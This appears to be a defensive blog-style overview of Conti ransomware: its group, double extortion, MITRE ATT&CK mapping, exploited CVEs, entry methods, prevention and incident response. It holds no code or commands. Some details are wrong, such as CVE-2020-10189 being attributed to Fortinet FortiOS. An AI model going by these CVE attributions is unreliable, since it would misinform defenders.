Conti Ransomware

Conti is a type of ransomware that was first discovered in December 2019. It is a highly sophisticated and advanced ransomware, known for its ability to propagate rapidly throughout an organization’s network and encrypt a large number of systems.

Conti uses multiple attack methods to spread, including exploiting vulnerabilities in Remote Desktop Protocol (RDP) connections and using stolen credentials to gain access to systems. Once it infects a system, the ransomware encrypts files and demands a ransom payment in exchange for the decryption key.

Conti is also known for its use of double extortion, which means that it not only encrypts files but also exfiltrates sensitive data from the infected system. The attackers then threaten to publicly release the stolen data if the ransom is not paid.

Conti is considered a significant threat to organizations, as it can cause major disruptions to business operations and lead to significant financial losses. It is recommended that organizations implement robust security measures, such as using multi-factor authentication for remote access, regularly patching systems, and regularly backing up important data to prevent data loss.

The Conti Group

The Conti group is a cyber criminal organization responsible for the development and distribution of the Conti ransomware. The group is known for its highly sophisticated and advanced techniques, as well as its use of double extortion tactics.

The group is reported to have been active since at least December 2019 and is known for targeting large organizations, including healthcare providers, municipalities, and government agencies. They are known for their aggressive tactics, including stealing and threatening to leak sensitive data if the ransom is not paid.

The group is also known for its use of various tactics to evade detection, including using custom-built malware, using multiple layers of encryption and making use of obfuscation techniques.

Due to its aggressive tactics, the Conti group is considered a significant threat to organizations, and it is recommended that organizations take proactive steps to prevent infection, such as implementing robust security measures, regular patching and monitoring of their networks, and having a solid incident response plan in place.

Conti Ransomware as a Service?

Reports suggest that the Conti group may be working with other cyber criminal actors or affiliate groups, and may be distributing the malware through these networks.

It is possible that other groups or individuals may be using the Conti ransomware without approval from the Conti group, as the malware’s source code has been discovered on various underground forums and hacker communities. However, it is not clear to what extent these groups or individuals are utilizing the ransomware, or if they are capable of replicating the same level of sophistication and tactics as the original Conti group.

It’s worth noting that the distribution of malware’s source code does not necessarily mean that the groups using it have the same level of skill, resources or intent as the original group that developed it. Some of these groups might be less experienced and less successful in carrying out attacks than the original group.

It’s also possible that other groups are using the Conti malware as a “brand” to extort victims, and they might not have any association with the original group. It is not entirely clear whether the Conti group operates a Ransomware-as-a-Service (RaaS) model though it would seem to make sense.

Why Conti is so dangerous

Conti is particularly dangerous for several reasons:

  • Highly sophisticated and advanced techniques: Conti uses multiple attack methods to spread, including exploiting vulnerabilities in Remote Desktop Protocol (RDP) connections and using stolen credentials to gain access to systems. It also uses advanced techniques to evade detection and make it harder for victims to recover from an attack.
  • Double extortion: Conti is known for its use of double extortion, which means that it not only encrypts files but also exfiltrates sensitive data from the infected system. The attackers then threaten to publicly release the stolen data if the ransom is not paid. This makes it particularly difficult for victims to decide whether to pay the ransom or not, as they risk losing sensitive data even if they pay.
  • Aggressive tactics: The Conti group is known for its aggressive tactics, including stealing and threatening to leak sensitive data if the ransom is not paid. This puts pressure on victims to pay the ransom, as they may be concerned about the potential reputational damage or legal repercussions of having sensitive data leaked.
  • Targeting large organizations: The Conti group is known for targeting large organizations, including healthcare providers, municipalities, and government agencies. These organizations often have more sensitive data and more to lose from an attack, making them more likely to pay a ransom.
  • High Ransom: The Conti group is known for demanding large ransoms, and in some cases, it has been reported that the group has demanded millions of dollars.

Mapping Conti to Mitre Att&ck

  • T1021 – Remote Services: Conti is known to exploit vulnerabilities in Remote Desktop Protocol (RDP) connections to gain access to systems. This can include using weak or easily guessed credentials, or exploiting unpatched vulnerabilities in the RDP software.
  • T1086 – PowerShell: Conti is known to use PowerShell to download and execute malicious payloads, allowing it to evade detection and spread rapidly through a network.
  • T1112 – Modify Registry: Conti is known to modify the registry on infected systems in order to persist and evade detection.
  • T1053 – Scheduled Task: Conti is known to use scheduled tasks to maintain persistence on an infected system, allowing it to continue running even after a reboot.
  • T1074 – Data Staged: Conti is known to exfiltrate sensitive data from the infected systems, which is later used to threaten the victim to pay the ransom.
  • T1055 – Process Injection: Conti is known to use process injection techniques to evade detection, by injecting its malicious code into legitimate processes.
  • T1057 – Process Discovery: Conti is known to enumerate running processes and system information to identify vulnerabilities and running services on a target machine

Conti Vulnerabilities

The Conti ransomware is known to exploit various vulnerabilities in order to gain access to systems, these vulnerabilities are often associated with the Common Vulnerabilities and Exposures (CVE) framework:

  • CVE-2019-0708: A vulnerability in Remote Desktop Services (RDS) that allows remote attackers to execute arbitrary code on a vulnerable system. This vulnerability is commonly referred to as BlueKeep.
  • CVE-2019-11510: A vulnerability in Pulse Secure VPN servers that allows remote attackers to execute arbitrary code on a vulnerable system.
  • CVE-2020-10189: A vulnerability in the Fortinet FortiOS SSL VPN web portal that allows remote attackers to execute arbitrary code on a vulnerable system.
  • CVE-2020-1472: A vulnerability in the Microsoft Netlogon Remote Protocol (MS-NRPC) that allows an attacker to execute arbitrary code on a vulnerable system with elevated privileges.

How Conti gets onto a network

  • Remote Desktop Protocol (RDP) vulnerabilities: Conti is known to exploit vulnerabilities in RDP connections to gain access to systems. This can include using weak or easily guessed credentials, or exploiting unpatched vulnerabilities in the RDP software.
  • Phishing: Phishing is a common tactic used by attackers to trick victims into providing sensitive information or clicking on a malicious link. Once a victim clicks on a link, the malware can be downloaded and installed onto the victim’s system.
  • Software vulnerabilities: Conti may also take advantage of vulnerabilities in software, such as unpatched web browsers, plugins, or operating systems.
  • Stolen credentials: The group is also known for using stolen credentials, such as login information obtained through previous data breaches or phishing campaigns, to gain access to systems.
  • Remote Access Trojan (RAT): The group may use a RAT to gain a foothold in the system, which is a type of malware that allows attackers to gain unauthorized access and control over a victim’s computer or device.

Preventing an attack

There are several steps that organizations can take to prevent the Conti ransomware from reaching their network, effectively what should be done to prevent any malware reaching the network:

  • Patch management: Regularly update and patch software, including operating systems, web browsers, and plugins to protect against known vulnerabilities.
  • Multi-factor authentication: Implement multi-factor authentication for remote access, including RDP connections, to make it harder for attackers to gain access to systems using stolen credentials.
  • Segmentation: Segment your network to limit the spread of the ransomware and make it easier to isolate and contain an attack.
  • Backups: Regularly back up important data, and ensure that backups are stored offline or in the cloud, so they can be easily restored in the event of an attack.
  • Security awareness training: Educate employees on how to identify and avoid phishing attempts and other social engineering tactics used by attackers.
  • Network monitoring: Regularly monitor your network for signs of unusual activity or attempts to connect to known malicious IP addresses.
  • Security controls: Use security controls, such as antivirus and firewall, to protect against malware and other cyber threats.

When Conti Strikes

When an organization is hit with the Conti ransomware, it is important to take immediate action to contain and mitigate the damage. Here are some steps that organizations can take:

  • Isolate the affected systems: Disconnect the affected systems from the network to prevent the ransomware from spreading further. This may also involve shutting down servers or other critical systems to prevent further damage.
  • Assess the damage: Determine which systems and data have been affected by the ransomware and the extent of the damage. This can help in planning the next steps and making decisions about whether to pay the ransom or not.
  • Backup your data: Organizations should have a recent backup of their data, and if they do, they should restore the data from backups after cleaning the affected systems. This is the best way to ensure minimal data loss.
  • Consider paying the ransom: If the organization decides to pay the ransom, it is important to ensure that it has the decryption key and that the attackers have not tampered with the key.
  • Contact law enforcement: Organizations should report the attack to the relevant law enforcement agencies, as this can help in identifying the attackers and potentially recovering the stolen data.
  • Review your security measures: Once the attack has been contained, organizations should review their security measures to identify any vulnerabilities that may have been exploited by the attackers. This can help in preventing future attacks.

It’s important to note that these steps may vary depending on the organization and the extent of the attack, but the most important is to have a robust incident response plan in place, and to be prepared to act quickly in the event of an attack.